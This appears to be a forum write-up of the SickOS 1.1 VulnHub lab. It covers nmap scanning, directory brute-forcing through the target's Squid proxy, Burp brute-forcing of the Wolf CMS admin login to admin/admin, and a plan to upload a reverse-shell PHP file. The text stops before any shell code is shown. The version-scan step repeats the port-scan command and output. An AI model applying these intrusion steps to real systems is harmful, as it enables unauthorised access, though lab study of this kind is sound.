Boot2root write-up: SickOS 1.1

十念 (Gold Member) | 2024-9-22 17:33:34

https://www.vulnhub.com/entry/sickos-11,132/
Host discovery and port scanning


  • Discover live hosts; .136 is the target, because the target VM was the last one I added
    nmap -sP 192.168.75.0/24
    //
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 11:36 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00038s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00031s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.136
    Host is up (0.00049s latency).
    MAC Address: 00:0C:29:62:FB:04 (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00027s latency).
    MAC Address: 00:50:56:F8:B3:1A (VMware)
    Nmap scan report for 192.168.75.131
    Host is up.
  • Scan all open ports on the target
    nmap -sT -min-rate 10000 -p- 192.168.75.136
    //
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 11:41 CST
    Nmap scan report for 192.168.75.136
    Host is up (0.00075s latency).
    Not shown: 65532 filtered tcp ports (no-response)
    PORT     STATE  SERVICE
    22/tcp   open   ssh
    3128/tcp open   squid-http
    8080/tcp closed http-proxy
    MAC Address: 00:0C:29:62:FB:04 (VMware)
  • Check the service versions and the OS version
    nmap -sT -min-rate 10000 -p- 192.168.75.136
    //
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 11:41 CST
    Nmap scan report for 192.168.75.136
    Host is up (0.00075s latency).
    Not shown: 65532 filtered tcp ports (no-response)
    PORT     STATE  SERVICE
    22/tcp   open   ssh
    3128/tcp open   squid-http
    8080/tcp closed http-proxy
    MAC Address: 00:0C:29:62:FB:04 (VMware)
  • Scan for vulnerabilities with the NSE vuln scripts
    nmap -script=vuln -p 22,3128,8080 192.168.75.136 -oA Desktop/test/vuln
    //
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 11:46 CST
    Nmap scan report for 192.168.75.136
    Host is up (0.00085s latency).
    PORT     STATE  SERVICE
    22/tcp   open   ssh
    3128/tcp open   squid-http
    8080/tcp closed http-proxy
    MAC Address: 00:0C:29:62:FB:04 (VMware)
Web penetration testing


  • Only 8080 is closed; the open ports are 3128, running the Squid proxy service, and SSH. Visiting port 3128 returns:
    ERROR
    The requested URL could not be retrieved
    The following error was encountered while trying to retrieve the URL: /
        Invalid URL
    Some aspect of the requested URL is incorrect.
    Some possible problems are:
        Missing or incorrect access protocol (should be "http://" or similar)
        Missing hostname
        Illegal double-escape in the URL-Path
        Illegal character in hostname; underscores are not allowed.
    Your cache administrator is webmaster.
    Generated Sun, 22 Sep 2024 06:03:35 GMT by localhost (squid/3.1.19)
    So the version is 3.1.19. Since it is a proxy server, it is presumably proxying something, most likely port 80.
  • My Firefox is connected to Burp's proxy address, so to reach other sites through a second proxy and still capture the requests, Burp needs an upstream proxy server configured.
    Roughly at: network -> connection -> upstream server; add the proxy address 192.168.75.136:3128 there.
  • Visiting 192.168.75.136 now returns a page, which means port 80 is being proxied behind 192.168.75.136:3128
    # page content
    BLEHHH!!!
    It is an internet slang word.
  • Directory scan; the proxy server has to be specified
    python .\dirsearch.py -u http://192.168.75.136 --proxy 192.168.75.136:3128
    //
    [12:15:18] 403 -  243B  - /cgi-bin/
    [12:15:19] 200 -  109B  - /connect
    [12:15:20] 403 -  239B  - /doc/
    [12:15:20] 403 -  242B  - /doc/api/
    [12:15:20] 403 -  247B  - /doc/html/index.html
    [12:15:20] 403 -  249B  - /doc/en/changes.html
    [12:15:20] 403 -  247B  - /doc/stable.version
    [12:15:29] 200 -   58B  - /robots.txt
    [12:15:30] 403 -  242B  - /server-status
    [12:15:30] 403 -  242B  - /server-status/
    Found robots.txt and connect

    • Contents of connect
      #!/usr/bin/python
      print "I Try to connect things very frequently\n"
      print "You may want to try my services"
    • Contents of robots.txt
      User-agent: *
      Disallow: /
      Dissalow: /wolfcms
      This gives us the hint: wolfcms

  • /wolfcms is a content-management CMS; brute-force its directories
    python .\dirsearch.py -u http://192.168.75.136/wolfcms --proxy 192.168.75.136:3128
    //
    [12:18:17] 200 -  403B  - /wolfcms/composer.json
    ....
    [12:18:17] 200 -    4KB - /wolfcms/CONTRIBUTING.md
    [12:18:18] 301 -  253B  - /wolfcms/docs  ->  http://192.168.75.136/wolfcms/docs/
    [12:18:18] 200 -  512B  - /wolfcms/docs/
    [12:18:18] 200 -    2KB - /wolfcms/docs/updating.txt
    [12:18:19] 200 -  894B  - /wolfcms/favicon.ico
    [12:18:26] 301 -  257B  - /wolfcms/public  ->  http://192.168.75.136/wolfcms/public/
    [12:18:26] 200 -  462B  - /wolfcms/public/
    [12:18:26] 200 -    2KB - /wolfcms/README.md
    [12:18:27] 200 -   20B  - /wolfcms/robots.txt
    Found robots.txt and README.md
    Visiting them: robots.txt is empty, and README.md contains the setup instructions.
  • Looking it up, the admin login address is /wolfcms/?/admin/login
    Searched online for the default username and password and tried them; login failed.
    Used Burp to brute-force it, with the username fixed to admin and a password wordlist.
    The brute-force succeeded: the username and password are both admin.
Getting an initial shell

  • After logging in, look for something exploitable; found uploadfile
    under file -> Uploadfile
    Upload a reverse-shell code file
    //getshell.php
